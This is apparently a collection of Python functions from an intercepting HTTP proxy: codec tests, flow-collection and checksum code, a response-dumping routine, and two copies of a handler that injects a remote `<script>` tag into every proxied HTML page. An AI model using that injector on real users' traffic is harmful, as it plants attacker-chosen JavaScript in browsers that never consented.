def test_gzip():
    """Check the gzip codec: encoded data round-trips, garbage decodes to None."""
    compressed = encoding.encode("gzip", "string")
    assert encoding.decode("gzip", compressed) == "string"
    # Input that is not valid gzip data is expected to come back as None;
    # None is a singleton, so it is compared by identity.
    assert encoding.decode("gzip", "bogus") is None
def test_simple(self):
    """Check the deflate codec: round-trip, trimmed payload, and garbage input."""
    compressed = encoding.encode("deflate", "string")
    assert encoding.decode("deflate", compressed) == "string"
    # The payload must still decode with its first two and last four bytes
    # sliced off (presumably the zlib header and checksum trailer -- confirm
    # against the codec implementation).
    assert encoding.decode("deflate", compressed[2:-4]) == "string"
    # Undecodable input is expected to yield None, compared by identity.
    assert encoding.decode("deflate", "bogus") is None
def test_deflate():
    """Check the deflate codec: round-trip, trimmed payload, and garbage input."""
    compressed = encoding.encode("deflate", "string")
    assert encoding.decode("deflate", compressed) == "string"
    # Same payload with the first two and last four bytes removed
    # (presumably zlib header and checksum trailer -- confirm against the
    # codec implementation) must decode to the same text.
    assert encoding.decode("deflate", compressed[2:-4]) == "string"
    # Undecodable input is expected to yield None, compared by identity.
    assert encoding.decode("deflate", "bogus") is None
def handle_response(self, flow):
    """
    Inject a script tag into HTML responses, then release the flow.

    If the first Content-Type value of the response starts with
    ``text/html``, a ``<script>`` element whose ``src`` is
    ``"http://" + self.options.target + self.options.path`` is inserted
    directly before ``</head>``. A body carrying a Content-Encoding is
    decoded before and re-encoded after the injection. When the body cannot
    be decoded or re-encoded the response content is left untouched.

    ``flow.reply()`` is called in every case.
    """
    headers = flow.response.headers
    content_type = headers['Content-Type']
    # We only inject into html responses
    if content_type and str(content_type[0]).startswith('text/html'):
        content_encoding = headers['Content-Encoding']
        # Decoding of message body (zip/deflate) needed?
        body = flow.response.content
        if content_encoding:
            body = encoding.decode(content_encoding[0], body)
        # encoding.decode reports failure as None. Pass such a response
        # through unmodified instead of overwriting its content with None.
        if body is not None:
            # We inject the js code directly before </head>
            injected_url = "http://" + self.options.target + self.options.path
            injected_code = "<script language=\"javascript\" type=\"text/javascript\" src=\"" + injected_url + "\"></script>"
            try:
                body = body.replace("</head>", injected_code + "</head>")
            except (TypeError, UnicodeError):
                # Best effort: a byte/unicode mismatch between body and the
                # injected snippet must not break the proxied response.
                pass
            # (Re)Encoding needed?
            if content_encoding:
                body = encoding.encode(content_encoding[0], body)
            # encoding.encode yields a falsy value for encodings it cannot
            # produce; keep the original content in that case.
            if body:
                flow.response.content = body
    flow.reply()
def handle_response(self, flow):
    """
    Store the request/response pair via ``self.db_save`` unless it is filtered.

    A flow is skipped when ``lytool.filter_url`` matches its URL, when
    ``self.ana2`` matches the request or response Content-type, or when
    ``self.ana_host`` matches its host and port. Otherwise the response body
    is decoded according to its first content-encoding header (if any) and
    saved together with the request data.
    """
    request = flow.request
    response = flow.response
    resc = response.headers.get('Content-type')
    reqc = request.headers.get('Content-type')

    filtered = (
        lytool.filter_url(request.url)
        or self.ana2(reqc)
        or self.ana2(resc)
        or self.ana_host(request.host, request.port)
    )
    if not filtered:
        raw_body = response.content
        gzipped = response.headers.get_first("content-encoding")
        content2 = encoding.decode(gzipped, raw_body) if gzipped else raw_body
        self.db_save(
            request.host,
            request.port,
            unquote_plus(request.url),
            request.path,
            request.method,
            request.scheme,
            request.httpversion,
            request.headers,
            request.content,
            response.headers,
            content2,
        )

    # NOTE(review): the original indentation was lost; the reply is assumed
    # to be sent for filtered and unfiltered flows alike -- confirm.
    flow.reply()
def handle_response(self, flow):
    """
    Inject a script tag into HTML responses, then release the flow.

    If the first Content-Type value of the response starts with
    ``text/html``, a ``<script>`` element whose ``src`` is
    ``"http://" + self.options.target + self.options.path`` is inserted
    directly before ``</head>``. A body carrying a Content-Encoding is
    decoded before and re-encoded after the injection. When the body cannot
    be decoded or re-encoded the response content is left untouched.

    ``flow.reply()`` is called in every case.
    """
    headers = flow.response.headers
    content_type = headers['Content-Type']
    # We only inject into html responses
    if content_type and str(content_type[0]).startswith('text/html'):
        content_encoding = headers['Content-Encoding']
        # Decoding of message body (zip/deflate) needed?
        body = flow.response.content
        if content_encoding:
            body = encoding.decode(content_encoding[0], body)
        # encoding.decode reports failure as None. Pass such a response
        # through unmodified instead of overwriting its content with None.
        if body is not None:
            # We inject the js code directly before </head>
            injected_url = "http://" + self.options.target + self.options.path
            injected_code = "<script language=\"javascript\" type=\"text/javascript\" src=\"" + injected_url + "\"></script>"
            try:
                body = body.replace("</head>", injected_code + "</head>")
            except (TypeError, UnicodeError):
                # Best effort: a byte/unicode mismatch between body and the
                # injected snippet must not break the proxied response.
                pass
            # (Re)Encoding needed?
            if content_encoding:
                body = encoding.encode(content_encoding[0], body)
            # encoding.encode yields a falsy value for encodings it cannot
            # produce; keep the original content in that case.
            if body:
                flow.response.content = body
    flow.reply()
def addFlow(self, flow):
    """
    Adds a flow to all lists in the corresponding format

    The state returned by ``flow._get_state()`` receives an ``id``, has the
    raw ``content`` of request and response replaced by ``contentLength``,
    and is appended to ``self._flows_serialized``. The bodies, with their
    HTTP content-encoding removed and converted to unicode using the
    charset from the content-type header (latin-1 by default), are appended
    to ``self._decoded_contents``. The flow itself goes to ``self._flows``.

    Returns the index of the newly added flow.
    """
    import traceback

    flowRepr = flow._get_state()
    flowRepr["id"] = len(self._flows_serialized)

    # In transparent mode, we are unsure about the actual host, but we want to show it in the GUI.
    # Firstly, we get the Host from the request headers.
    # As this might be faked, we go on and check whether the request IP matches
    # one of the DNS entries belonging to the headerHost.
    # NOTE(review): `True or` makes this block unconditional, so the IP
    # regex is never evaluated -- confirm whether that is still intended.
    if True or FlowCollection.regex_isip.match(flowRepr["request"]["host"]):
        try:
            headerHost = flow.request.headers["Host"]
            if headerHost:
                headerHost = headerHost[0]
                # NOTE(review): this resolves the request host, not
                # headerHost, so the comparison below does not involve the
                # Host header at all -- confirm against the comment above.
                info = socket.getaddrinfo(
                    flowRepr["request"]["host"],
                    flowRepr["request"]["port"],
                    0, 0, socket.SOL_TCP)
                for addr in info:
                    if (addr[4][0] == flowRepr["request"]["host"]
                            and addr[4][1] == flowRepr["request"]["port"]):
                        flowRepr["request"]["hostFormatted"] = headerHost
                        break
        except socket.gaierror:
            pass
        except Exception:
            # Host guessing is best effort; report and carry on.
            print(traceback.format_exc())

    decoded_content = {}
    for i in ["request", "response"]:
        # strip content out of the flowRepr
        flowRepr[i]["contentLength"] = len(flowRepr[i]["content"])
        del flowRepr[i]["content"]

        r = getattr(flow, i)
        decoded = r.content

        # decode with http content-encoding
        ce = r.headers["content-encoding"]
        if ce and ce[0] in encoding.ENCODINGS:
            unpacked = encoding.decode(ce[0], r.content)
            # encoding.decode returns None when decoding fails; keep the
            # raw body then, so the charset step below still gets a string.
            if unpacked is not None:
                decoded = unpacked

        # decode with http content-type encoding
        ct = r.headers["content-type"]
        default_charset = "latin-1"  # HTTP 1.1 says that the default charset is ISO-8859-1
        charset = default_charset
        if ct:
            m = FlowCollection.regex_charset.search(ct[0])
            if m:
                # drop surrounding single or double quotes
                charset = m.group(1).strip('"\'')
        # TODO: guess from html metadata
        try:
            decoded = decoded.decode(charset)
        except Exception:
            # Unknown charset name or undecodable bytes: retry with the default.
            try:
                decoded = decoded.decode(default_charset)
            except Exception:
                print("Warning: Could not decode request.")
                print(traceback.format_exc())

        decoded_content[i] = decoded

    self._flows.append(flow)
    self._flows_serialized.append(flowRepr)
    self._decoded_contents.append(decoded_content)
    return len(self._flows_serialized) - 1
def test_gzip():
    """Check the gzip codec: encoded data round-trips, garbage decodes to None."""
    compressed = encoding.encode("gzip", "string")
    assert encoding.decode("gzip", compressed) == "string"
    # Input that is not valid gzip data is expected to come back as None;
    # None is a singleton, so it is compared by identity.
    assert encoding.decode("gzip", "bogus") is None
def add(self, flow):
    """
    Gets called whenever a new flow has been added.

    Writes the response body (content-decoded when a non-identity
    content-encoding is given and decoding succeeds) to a file below
    ``self.path``. The relative location is built from the request host,
    the port (when it is not 80) and the unquoted request path without
    query string and fragment. Flows without response content are skipped,
    and nothing is written if an existing candidate file already holds the
    same content.
    """
    # dumping empty flows is stupid (also covers a missing, i.e. None, body)
    if not flow.response.content:
        return

    content = flow.response.content
    enc = flow.response.headers.get("content-encoding")
    if enc and enc[0] != "identity":
        decoded = encoding.decode(enc[0], content)
        if decoded:
            content = decoded

    # get host and path
    host = flow.request.host
    if flow.request.port != 80:
        host += "-" + str(flow.request.port)
    path = unquote(
        flow.request.path.split("#")[0].split("?")[0].lstrip("/\\"))
    if path == "":
        path = "__root__"

    # subdir is our relative path
    subdir = os.path.join(host, path)

    # remove invalid characters
    subdir = os.path.normpath(allowed_chars.sub('_', subdir))

    # forbid relative directory changes.
    subdir = "/".join(
        i.lstrip(".") for i in subdir.replace("\\", "/").split("/"))

    # shorten overlong path components, keeping their first and last 20 chars
    subdir = "/".join(
        i[:20] + "[...]" + i[-20:] if (len(i) > 40) else i
        for i in subdir.split("/"))

    # cut off too long filenames
    MAX_DIR_LENGTH = 150
    MAX_FILE_LENGTH = 50
    MAX_EXT_LENGTH = 30
    if len(subdir) > MAX_DIR_LENGTH:
        if subdir[MAX_DIR_LENGTH] == "/":
            subdir = subdir[0:MAX_DIR_LENGTH + 1]
        else:
            subdir = subdir[0:MAX_DIR_LENGTH]
        subdir += "[...]"

    # ensure that subdir is relative, otherwise it could exploit outside of self.path
    # os.path.join(foo,"/bar") => "/bar"
    subdir = os.path.normpath("./" + subdir)

    filename = os.path.join(self.path, subdir)

    # We have the problematic situation that both foo.com/bar
    # and foo.com/bar/baz can be valid files.
    # However, we cannot create both a folder and a file called "baz" in the same directory.
    # A possible approach would be using folders for everything and placing __resource__ files in them.
    # While this would be a much more consistent structure, it doesn't represent the file system very well.
    # As this view is for visualization purposes only, we took the approach to append [dir] to conflicting folders.
    # To accomplish this, we use a slightly modified version of os.makedirs.
    def makedirs(directory):
        head, tail = os.path.split(directory)
        # os.path.split yields an empty head for a bare name; recursing on
        # "" would never terminate, so only walk up while there is a parent.
        if head and not os.path.isdir(head):
            head = makedirs(head)
            directory = os.path.join(head, tail)
        if os.path.isfile(directory):  # our special case - rename current dir
            tail += "[dir]"
            directory = os.path.join(head, tail)
            return makedirs(directory)
        if not os.path.isdir(directory):
            os.mkdir(directory)
        return directory

    d, filename = os.path.split(filename)
    filename = os.path.join(makedirs(d), filename)

    filename, ext = os.path.splitext(filename)
    if len(filename) > MAX_DIR_LENGTH + MAX_FILE_LENGTH:
        filename = filename[0:MAX_DIR_LENGTH + MAX_FILE_LENGTH] + "[...]"

    if len(ext) >= MAX_EXT_LENGTH:
        ext = "[..]" + ext[-MAX_EXT_LENGTH:]

    appendix = ""
    # rename if file already exists and content is different
    if os.path.isdir(filename + ext):
        os.rename(filename + ext, filename + ext + "[dir]")
    while os.path.isfile(filename + str(appendix) + ext):
        with open(filename + str(appendix) + ext, "rb") as f:
            s = f.read()
        if s == content:
            # identical dump already on disk
            return
        if appendix == "":
            appendix = 1
        else:
            appendix += 1

    filename = filename + str(appendix) + ext

    with open(filename, 'wb') as f:
        f.write(str(content))
def test_simple(self):
    """The identity codec returns its input; an unknown codec encodes to a falsy value."""
    for codec_call in (encoding.decode, encoding.encode):
        assert "string" == codec_call("identity", "string")
    unsupported = encoding.encode("nonexistent", "string")
    assert not unsupported
def addFlow(self, flow):
    """
    Adds a flow to all lists in the corresponding format

    The state returned by ``flow._get_state()`` receives an ``id``, has the
    raw ``content`` of request and response replaced by ``contentLength``
    and ``contentChecksums`` (md5, sha1 and sha256 of the content-decoded
    body, or of each part returned by ``getParts`` for requests), and is
    appended to ``self._flows_serialized``. The bodies, converted via the
    content-type charset (latin-1 by default) and re-encoded as UTF-8, are
    appended to ``self._decoded_contents``. The flow itself goes to
    ``self._flows``.

    Returns the index of the newly added flow.
    """
    import traceback

    flowRepr = flow._get_state()
    flowRepr["id"] = len(self._flows_serialized)

    # In transparent mode, we are unsure about the actual host, but we want to show it in the GUI.
    # Firstly, we get the Host from the request headers.
    # As this might be faked, we go on and check whether the request IP matches
    # one of the DNS entries belonging to the headerHost.
    if FlowCollection.regex_isip.match(flowRepr["request"]["host"]):
        try:
            headerHost = flow.request.headers["Host"]
            if headerHost:
                headerHost = headerHost[0]
                # NOTE(review): this resolves the request host, not
                # headerHost, so the comparison below does not involve the
                # Host header at all -- confirm against the comment above.
                info = socket.getaddrinfo(
                    flowRepr["request"]["host"],
                    flowRepr["request"]["port"],
                    0, 0, socket.SOL_TCP)
                for addr in info:
                    if addr[4][0] == flowRepr["request"]["host"]:
                        flowRepr["request"]["host_guess"] = headerHost
                        break
        except socket.gaierror:
            pass
        except Exception:
            # Host guessing is best effort; report and carry on.
            print(traceback.format_exc())

    # Save decoded content
    decoded_content = {}
    algorithms = ["md5", "sha1", "sha256"]
    for i in ["request", "response"]:
        # strip content out of the flowRepr
        flowRepr[i]["contentLength"] = len(flowRepr[i]["content"])
        del flowRepr[i]["content"]

        r = getattr(flow, i)
        decoded = r.content

        # decode with http content-encoding
        try:
            ce = r.headers["content-encoding"]
            if ce and ce[0] in encoding.ENCODINGS:
                decoded_ = encoding.decode(ce[0], decoded)
                # If the decoding fails, encoding.decode returns None.
                if decoded_ is not None:
                    decoded = decoded_
        except Exception:
            print("Warning: Data cannot be decoded with given Content Encoding.")

        # calculate hashsums
        flowRepr[i]["contentChecksums"] = {}
        parts = {"Checksum": decoded}

        # Handle multipart checksums
        if i == "request":
            try:
                headers = dict(
                    map(str.lower, map(str, a))
                    for a in flow.request.headers)  # odict -> (lowered) dict
                fs = cgi.FieldStorage(
                    StringIO.StringIO(decoded),
                    headers,
                    environ={'REQUEST_METHOD': 'POST'})
                parts = getParts(fs)
            except Exception:
                # Fall back to the single whole-body checksum.
                traceback.print_exc()
                print("Warning: Cannot decode multipart")

        for item, data in parts.viewitems():
            flowRepr[i]["contentChecksums"][item] = dict(
                (a, getattr(hashlib, a)(data).hexdigest()) for a in algorithms)

        # decode with http content-type encoding
        ct = r.headers["content-type"]
        default_charset = "latin-1"  # HTTP 1.1 says that the default charset is ISO-8859-1
        # RFC2616 3.7.1
        charset = default_charset
        if ct:
            m = FlowCollection.regex_charset.search(ct[0])
            if m:
                # drop surrounding single or double quotes
                charset = m.group(1).strip('"\'')
        # TODO: guess from html metadata
        try:
            decoded = decoded.decode(charset)
        except Exception:
            # Unknown charset name or undecodable bytes: retry with the default.
            try:
                decoded = decoded.decode(default_charset)
            except Exception:
                print("Warning: Could not decode request.")
                print(traceback.format_exc())

        try:
            decoded = decoded.encode('utf-8')
        except Exception:
            print("Warning: Cannot encode request to utf8")

        decoded_content[i] = decoded

    self._flows.append(flow)
    self._flows_serialized.append(flowRepr)
    self._decoded_contents.append(decoded_content)
    return len(self._flows_serialized) - 1
def test_simple(self):
    """Check the gzip codec: encoded data round-trips, garbage decodes to None."""
    compressed = encoding.encode("gzip", "string")
    assert encoding.decode("gzip", compressed) == "string"
    # Input that is not valid gzip data is expected to come back as None;
    # None is a singleton, so it is compared by identity.
    assert encoding.decode("gzip", "bogus") is None
def test_fallthrough(self):
    """Decoding with an encoding name the module does not know must yield None."""
    # None is a singleton, so it is compared by identity.
    assert encoding.decode("nonexistent encoding", "string") is None
def addFlow(self, flow):
    """
    Adds a flow to all lists in the corresponding format

    The state returned by ``flow._get_state()`` receives an ``id``, has the
    raw ``content`` of request and response replaced by ``contentLength``
    and ``contentChecksums`` (md5 and sha256), and is appended to
    ``self._flows_serialized``. The bodies, with their HTTP
    content-encoding removed, converted via the content-type charset
    (latin-1 by default) and re-encoded as UTF-8, are appended to
    ``self._decoded_contents``. The flow itself goes to ``self._flows``.

    Returns the index of the newly added flow.
    """
    import traceback

    flowRepr = flow._get_state()
    flowRepr["id"] = len(self._flows_serialized)

    # In transparent mode, we are unsure about the actual host, but we want to show it in the GUI.
    # Firstly, we get the Host from the request headers.
    # As this might be faked, we go on and check whether the request IP matches
    # one of the DNS entries belonging to the headerHost.
    # NOTE(review): `True or` makes this block unconditional, so the IP
    # regex is never evaluated -- confirm whether that is still intended.
    if True or FlowCollection.regex_isip.match(flowRepr["request"]["host"]):
        try:
            headerHost = flow.request.headers["Host"]
            if headerHost:
                headerHost = headerHost[0]
                # NOTE(review): this resolves the request host, not
                # headerHost, so the comparison below does not involve the
                # Host header at all -- confirm against the comment above.
                info = socket.getaddrinfo(
                    flowRepr["request"]["host"],
                    flowRepr["request"]["port"],
                    0, 0, socket.SOL_TCP)
                for addr in info:
                    if (addr[4][0] == flowRepr["request"]["host"]
                            and addr[4][1] == flowRepr["request"]["port"]):
                        flowRepr["request"]["hostFormatted"] = headerHost
                        break
        except socket.gaierror:
            pass
        except Exception:
            # Host guessing is best effort; report and carry on.
            print(traceback.format_exc())

    # Save decoded content
    decoded_content = {}
    for i in ["request", "response"]:
        # strip content out of the flowRepr
        flowRepr[i]["contentLength"] = len(flowRepr[i]["content"])
        del flowRepr[i]["content"]

        r = getattr(flow, i)
        decoded = r.content

        # decode with http content-encoding
        try:
            ce = r.headers["content-encoding"]
            if ce and ce[0] in encoding.ENCODINGS:
                unpacked = encoding.decode(ce[0], r.content)
                # encoding.decode returns None when decoding fails; keep the
                # raw body then, otherwise None would reach the charset step
                # and, later on, the hash functions (which reject it).
                if unpacked is not None:
                    decoded = unpacked
        except Exception:
            print("Warning: Data cannot be decoded with given Content Encoding.")

        # decode with http content-type encoding
        ct = r.headers["content-type"]
        default_charset = "latin-1"  # HTTP 1.1 says that the default charset is ISO-8859-1
        # RFC2616 3.7.1
        charset = default_charset
        if ct:
            m = FlowCollection.regex_charset.search(ct[0])
            if m:
                # drop surrounding single or double quotes
                charset = m.group(1).strip('"\'')
        # TODO: guess from html metadata
        try:
            decoded = decoded.decode(charset)
        except Exception:
            # Unknown charset name or undecodable bytes: retry with the default.
            try:
                decoded = decoded.decode(default_charset)
            except Exception:
                print("Warning: Could not decode request.")
                print(traceback.format_exc())

        try:
            decoded = decoded.encode('utf-8')
        except Exception:
            print("Warning: Cannot encode request to utf8")

        decoded_content[i] = decoded

    # calculate hashsums
    # NOTE(review): the checksums are taken over the charset-converted,
    # UTF-8 re-encoded body, so for payloads that are not already UTF-8 they
    # differ from a checksum of the transferred bytes -- confirm intent.
    algorithms = ["md5", "sha256"]
    for i in ["request", "response"]:
        flowRepr[i]["contentChecksums"] = {}
        parts = {"Checksum": decoded_content[i]}

        # Handle multipart checksums
        if i == "request":
            try:
                headers = dict(
                    map(str.lower, map(str, a))
                    for a in flow.request.headers)  # odict -> (lowered) dict
                fs = cgi.FieldStorage(
                    StringIO.StringIO(decoded_content[i]),
                    headers,
                    environ={'REQUEST_METHOD': 'POST'})
                parts = getParts(fs)
            except Exception:
                # Fall back to the single whole-body checksum.
                traceback.print_exc()
                print("Warning: Cannot decode multipart")

        # TODO: Analyze request and split it up into parameters to match file upload
        for item, data in parts.viewitems():
            flowRepr[i]["contentChecksums"][item] = dict(
                (a, getattr(hashlib, a)(data).hexdigest()) for a in algorithms)

    self._flows.append(flow)
    self._flows_serialized.append(flowRepr)
    self._decoded_contents.append(decoded_content)
    return len(self._flows_serialized) - 1
def test_identity():
    """Check the identity codec and the handling of unknown encoding names."""
    assert encoding.decode("identity", "string") == "string"
    assert encoding.encode("identity", "string") == "string"
    # Unknown names: encode gives a falsy value, decode gives None
    # (a singleton, hence the identity comparison).
    assert not encoding.encode("nonexistent", "string")
    assert encoding.decode("nonexistent encoding", "string") is None
def add(self, flow):
    """
    Gets called whenever a new flow has been added.

    Writes the response body (content-decoded when a non-identity
    content-encoding is given and decoding succeeds) to a file below
    ``self.path``. The relative location is built from the request host,
    the port (when it is not 80) and the request path without query string
    and fragment. Flows without response content are skipped, and nothing
    is written if an existing candidate file already holds the same content.
    """
    # dumping empty flows is stupid (also covers a missing, i.e. None, body)
    if not flow.response.content:
        return

    # FIXME: What about content type charset?
    content = flow.response.content
    enc = flow.response.headers.get("content-encoding")
    if enc and enc[0] != "identity":
        decoded = encoding.decode(enc[0], content)
        if decoded:
            content = decoded

    # get host and path
    host = flow.request.host
    if flow.request.port != 80:
        host += "-" + str(flow.request.port)
    path = flow.request.path.split("#")[0].split("?")[0].lstrip("/\\")
    if path == "":
        path = "__root__"

    # subdir is our relative path
    subdir = os.path.join(host, path)

    # forbid relative directory changes.
    subdir = "/".join(
        i.lstrip(".") for i in subdir.replace("\\", "/").split("/"))

    # shorten overlong path components, keeping their first and last 20 chars
    subdir = "/".join(
        i[:20] + "[...]" + i[-20:] if (len(i) > 40) else i
        for i in subdir.split("/"))

    # remove invalid characters
    subdir = os.path.normpath(
        "".join(i for i in subdir if i not in r':*?"<>|'))

    # cut off too long filenames
    MAX_DIR_LENGTH = 150
    MAX_FILE_LENGTH = 50
    MAX_EXT_LENGTH = 30
    if len(subdir) > MAX_DIR_LENGTH:
        if subdir[MAX_DIR_LENGTH] == "/":
            subdir = subdir[0:MAX_DIR_LENGTH + 1]
        else:
            subdir = subdir[0:MAX_DIR_LENGTH]
        subdir += "[...]"

    # ensure that subdir is relative, otherwise it could exploit outside of self.path
    # os.path.join(foo,"/bar") => "/bar"
    subdir = os.path.normpath("./" + subdir)

    filename = os.path.join(self.path, subdir)

    # We have the problematic situation that both foo.com/bar
    # and foo.com/bar/baz can be valid files.
    # However, we cannot create both a folder and a file called "baz" in the same directory.
    # A possible approach would be using folders for everything and placing __resource__ files in them.
    # While this would be a much more consistent structure, it doesn't represent the file system very well.
    # As this view is for visualization purposes only, we took the approach to append [dir] to conflicting folders.
    # To accomplish this, we use a slightly modified version of os.makedirs.
    def makedirs(directory):
        head, tail = os.path.split(directory)
        # os.path.split yields an empty head for a bare name; recursing on
        # "" would never terminate, so only walk up while there is a parent.
        if head and not os.path.isdir(head):
            head = makedirs(head)
            directory = os.path.join(head, tail)
        if os.path.isfile(directory):  # our special case - rename current dir
            tail += "[dir]"
            directory = os.path.join(head, tail)
            return makedirs(directory)
        if not os.path.isdir(directory):
            os.mkdir(directory)
        return directory

    d, filename = os.path.split(filename)
    filename = os.path.join(makedirs(d), filename)

    filename, ext = os.path.splitext(filename)
    if len(filename) > MAX_DIR_LENGTH + MAX_FILE_LENGTH:
        filename = filename[0:MAX_DIR_LENGTH + MAX_FILE_LENGTH] + "[...]"

    if len(ext) >= MAX_EXT_LENGTH:
        ext = "[..]" + ext[-MAX_EXT_LENGTH:]

    appendix = ""
    # rename if file already exists and content is different
    if os.path.isdir(filename + ext):
        os.rename(filename + ext, filename + ext + "[dir]")
    while os.path.isfile(filename + str(appendix) + ext):
        # The dump is written in binary mode below, so it has to be read
        # back in binary mode for the comparison to be byte-exact.
        with open(filename + str(appendix) + ext, "rb") as f:
            s = f.read()
        if s == content:
            # identical dump already on disk
            return
        if appendix == "":
            appendix = 1
        else:
            appendix += 1

    filename = filename + str(appendix) + ext

    with open(filename, 'wb') as f:
        f.write(str(content))